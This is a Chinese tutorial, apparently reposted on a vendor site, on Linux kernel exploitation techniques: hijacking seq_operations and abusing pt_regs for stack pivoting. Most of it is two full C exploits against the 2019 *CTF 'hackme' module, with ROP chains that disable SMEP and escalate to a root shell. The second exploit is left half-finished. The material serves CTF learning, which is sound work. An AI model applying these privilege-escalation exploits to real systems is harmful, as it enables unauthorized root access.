溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

kernel怎么利用pt?regs劫持seq?operations

發(fā)布時(shí)間:2022-05-16 14:23:12 來(lái)源:億速云 閱讀:176 作者:iii 欄目:開(kāi)發(fā)技術(shù)

本文小編為大家詳細(xì)介紹“kernel怎么利用pt regs劫持seq operations”,內(nèi)容詳細(xì),步驟清晰,細(xì)節(jié)處理妥當(dāng),希望這篇“kernel怎么利用pt regs劫持seq operations”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來(lái)學(xué)習(xí)新知識(shí)吧。

劫持seq_operations進(jìn)行棧遷移

seq_operations是一個(gè)大小為0x20的結(jié)構(gòu)體,在打開(kāi)/proc/self/stat會(huì)申請(qǐng)出來(lái)。里面定義了四個(gè)函數(shù)指針,通過(guò)他們可以泄露出內(nèi)核基地址。

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

當(dāng)我們r(jià)ead一個(gè)stat文件時(shí),內(nèi)核會(huì)調(diào)用proc_ops的proc_read_iter指針

ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    struct seq_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

即會(huì)調(diào)用seq_operations->start指針,我們只需覆蓋start指針為特定gadget,即可控制程序執(zhí)行流。

拿2019 *starctf hackme關(guān)閉smap來(lái)嘗試這種打法

exp1

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/sem.h>
#include <sys/mman.h>
int fd;
size_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr;
size_t vmlinux_base, heap_base, off, commit_creds, prepare_kernel_cred;
size_t user_cs, user_ss, user_sp, user_rflags;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t rop[0x100] = {0};
struct Heap{
    size_t index;
    char *data;
    size_t len;
    size_t offset;
};
void add(int index, size_t len, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	ioctl(fd, 0x30000, &heap);
}
void delete(int index)
{
	struct Heap heap;
	heap.index = index;
	ioctl(fd, 0x30001, &heap);
}
void edit(int index, size_t len, size_t offset, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	heap.offset = offset;
	ioctl(fd, 0x30002, &heap);
}
void show(int index, size_t len, size_t offset, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	heap.offset = offset;
	ioctl(fd, 0x30003, &heap);
}
void save_status()
{
	__asm__(
	"mov user_cs, cs;"
	"mov user_ss, ss;"
	"mov user_sp, rsp;"
	"pushf;"
	"pop user_rflags;"
	);
	puts("[+] save the state success!");
}
void get_shell()
{
	if (getuid() == 0)
	{
		puts("[+] get root");
		//system("/bin/sh");
		char *shell = "/bin/sh";
		char *args[] = {shell, NULL};
		execve(shell, args, NULL);
	}
	else
	{
		puts("[-] get shell error");
		sleep(3);
		exit(0);
	}
}
void get_root(void)
{
	//commit_creds(prepare_kernel_cred(0));
	void *(*pkc)(int) = (void *(*)(int))prepare_kernel_cred;
	void (*cc)(void *) = (void (*)(void *))commit_creds;
	(*cc)((*pkc)(0));
}
int main()
{
	char buf[0x1000] = {0};
	int i;
	size_t seq_data[4] = {0};
	save_status();
	fd = open("/dev/hackme",0);
	if(fd < 0)
	{
		puts("[-] open file error");
		exit(0);
	}
	add(0, 0x20, buf); // 0
	add(1, 0x20, buf); // 1
	add(2, 0x20, buf); // 2
	add(3, 0x20, buf); // 3
	delete(0);
	delete(2);
	int fd_seq = open("/proc/self/stat", 0);
	if(fd_seq < 0)
	{
		puts("[-] open stat error");
		exit(0);
	}
	show(3, 0x20, -0x20, buf);
	vmlinux_base = ((size_t *)buf)[0] - 0xd30c0;
	printf("[+] vmlinux_base=> 0x%lx\n", vmlinux_base);
	off = vmlinux_base - raw_vmlinux_base;
	commit_creds = off + 0xffffffff8104d220;
	prepare_kernel_cred = off + 0xffffffff8104d3d0;
	show(1, 0x20, -0x20, buf);
	heap_base = ((size_t *)buf)[0] - 0x80;
	printf("[+] heap_base=> 0x%lx\n", heap_base);
	i = 0;
	rop[i++] = off + 0xffffffff8101b5a1; // pop rax; ret;
	rop[i++] = 0x6f0;
	rop[i++] = off + 0xffffffff8100252b; // mov cr4, rax; push rcx; popfq; pop rbp; ret;
	rop[i++] = 0;
	rop[i++] = (size_t)get_root;
	rop[i++] = off + 0xffffffff81200c2e; // swapgs; popfq; pop rbp; ret; 
	rop[i++] = 0;
	rop[i++] = 0;
	rop[i++] = off + 0xffffffff81019356; // iretq; pop rbp; ret;
	rop[i++] = (size_t)get_shell;
	rop[i++] = user_cs;
	rop[i++] = user_rflags;
	rop[i++] = user_sp;
	rop[i++] = user_ss;
	((size_t *)buf)[0] = off + 0xffffffff8103018e; // xchg eax, esp; ret;
	edit(3, 0x20, -0x20, buf);
	size_t fake_stack = (heap_base + 0x40) & 0xffffffff;
	size_t mmap_base = fake_stack & 0xfffff000;
	if(mmap((void *)mmap_base, 0x30000, 7, 0x22, -1, 0) != (void *)mmap_base)
		{
			puts("[-] mmap error");
			sleep(3);
			exit(0);
		}
	else
		puts("[+] mmap success");
	memcpy((void *)fake_stack, rop, sizeof(rop));
	read(fd_seq, buf, 1);
	return 0;
}

利用pt_regs

可以寫(xiě)一段如下匯編來(lái)控制程序執(zhí)行流,再通過(guò)將寄存器押上棧進(jìn)行ROP

	__asm__(
	"mov r15, 0x1111111111;"
	"mov r14, 0x2222222222;"
	"mov r13, 0x3333333333;"
	"mov r12, 0x4444444444;"
	"mov rbp, 0x5555555555;"
	"mov rbx, 0x6666666666;"
	"mov r11, 0x7777777777;"
	"mov r10, 0x8888888888;"
	"mov r9,  0x9999999999;"
	"mov r8,  0xaaaaaaaaaa;"
	"mov rcx, 0x666666;"
	"mov rdx, 8;"
	"mov rsi, rsp;"
	"mov rdi, fd_seq;"
	"xor rax, rax;"
	"syscall"
	);

這是為什么呢?大家都知道系統(tǒng)調(diào)用是通過(guò)布置好寄存器的值之后執(zhí)行syscall的過(guò)程,通過(guò)門(mén)結(jié)構(gòu)進(jìn)入到內(nèi)核中的entry_SYSCALL_64函數(shù)。這個(gè)函數(shù)的內(nèi)部存在這樣一條指令: 

PUSH_AND_CLEAR_REGS rax=$-ENOSYS

這個(gè)指令很巧妙,他會(huì)把所有的寄存器壓到棧上形成一個(gè)pt_regs結(jié)構(gòu)體,位于內(nèi)核棧底。

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

這里寄存器r8-r15都會(huì)被放到棧上,如果我們可以合理控制好這些寄存器的值,再找到一個(gè)add rsp, xxxh; ret;的寄存器放在seq_operations->start的位置,那么就可以控制程序執(zhí)行流,考慮到一般這里棧上連續(xù)存放的寄存器一般只有4-5個(gè)

我們可以用commit_creds(&init_cred)來(lái)代替commit_creds(prepare_kernel_cred(NULL)),

布局如下:

pop_rdi_ret;
init_cred;
commit_creds;
swapgs_restore_regs_and_return_to_usermode;

由于我這里并沒(méi)有能找到合適的add rsp, xxxh; ret;,故就留一個(gè)調(diào)試半成品exp

exp2

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/sem.h>
#include <sys/mman.h>
int fd;
size_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr;
size_t vmlinux_base, heap_base, off, commit_creds, prepare_kernel_cred;
size_t user_cs, user_ss, user_sp, user_rflags;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t rop[0x100] = {0};
int fd_seq;
struct Heap{
    size_t index;
    char *data;
    size_t len;
    size_t offset;
};
void add(int index, size_t len, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	ioctl(fd, 0x30000, &heap);
}
void delete(int index)
{
	struct Heap heap;
	heap.index = index;
	ioctl(fd, 0x30001, &heap);
}
void edit(int index, size_t len, size_t offset, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	heap.offset = offset;
	ioctl(fd, 0x30002, &heap);
}
void show(int index, size_t len, size_t offset, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	heap.offset = offset;
	ioctl(fd, 0x30003, &heap);
}
void save_status()
{
	__asm__(
	"mov user_cs, cs;"
	"mov user_ss, ss;"
	"mov user_sp, rsp;"
	"pushf;"
	"pop user_rflags;"
	);
	puts("[+] save the state success!");
}
void get_shell()
{
	if (getuid() == 0)
	{
		puts("[+] get root");
		//system("/bin/sh");
		char *shell = "/bin/sh";
		char *args[] = {shell, NULL};
		execve(shell, args, NULL);
	}
	else
	{
		puts("[-] get shell error");
		sleep(3);
		exit(0);
	}
}
void get_root(void)
{
	//commit_creds(prepare_kernel_cred(0));
	void *(*pkc)(int) = (void *(*)(int))prepare_kernel_cred;
	void (*cc)(void *) = (void (*)(void *))commit_creds;
	(*cc)((*pkc)(0));
}
int main()
{
	char buf[0x1000] = {0};
	int i;
	size_t seq_data[4] = {0};
	save_status();
	fd = open("/dev/hackme",0);
	if(fd < 0)
	{
		puts("[-] open file error");
		exit(0);
	}
	add(0, 0x20, buf); // 0
	add(1, 0x20, buf); // 1
	delete(0);
	fd_seq = open("/proc/self/stat", 0);
	if(fd_seq < 0)
	{
		puts("[-] open stat error");
		exit(0);
	}
	show(1, 0x20, -0x20, buf);
	vmlinux_base = ((size_t *)buf)[0] - 0xd30c0;
	printf("[+] vmlinux_base=> 0x%lx\n", vmlinux_base);
	off = vmlinux_base - raw_vmlinux_base;
	commit_creds = off + 0xffffffff8104d220;
	prepare_kernel_cred = off + 0xffffffff8104d3d0;
	size_t gadget = 0xffffffff8103018e; // xchg eax, esp; ret;
	((size_t *)buf)[0] = gadget;
	edit(1, 0x20, -0x20, buf);
	__asm__(
	"mov r15, 0x1111111111;"
	"mov r14, 0x2222222222;"
	"mov r13, 0x3333333333;"
	"mov r12, 0x4444444444;"
	"mov rbp, 0x5555555555;"
	"mov rbx, 0x6666666666;"
	"mov r11, 0x7777777777;"
	"mov r10, 0x8888888888;"
	"mov r9,  0x9999999999;"
	"mov r8,  0xaaaaaaaaaa;"
	"mov rcx, 0x666666;"
	"mov rdx, 8;"
	"mov rsi, rsp;"
	"mov rdi, fd_seq;"
	"xor rax, rax;"
	"syscall"
	);
	return 0;
}

讀到這里,這篇“kernel怎么利用pt regs劫持seq operations”文章已經(jīng)介紹完畢,想要掌握這篇文章的知識(shí)點(diǎn)還需要大家自己動(dòng)手實(shí)踐使用過(guò)才能領(lǐng)會(huì),如果想了解更多相關(guān)內(nèi)容的文章,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI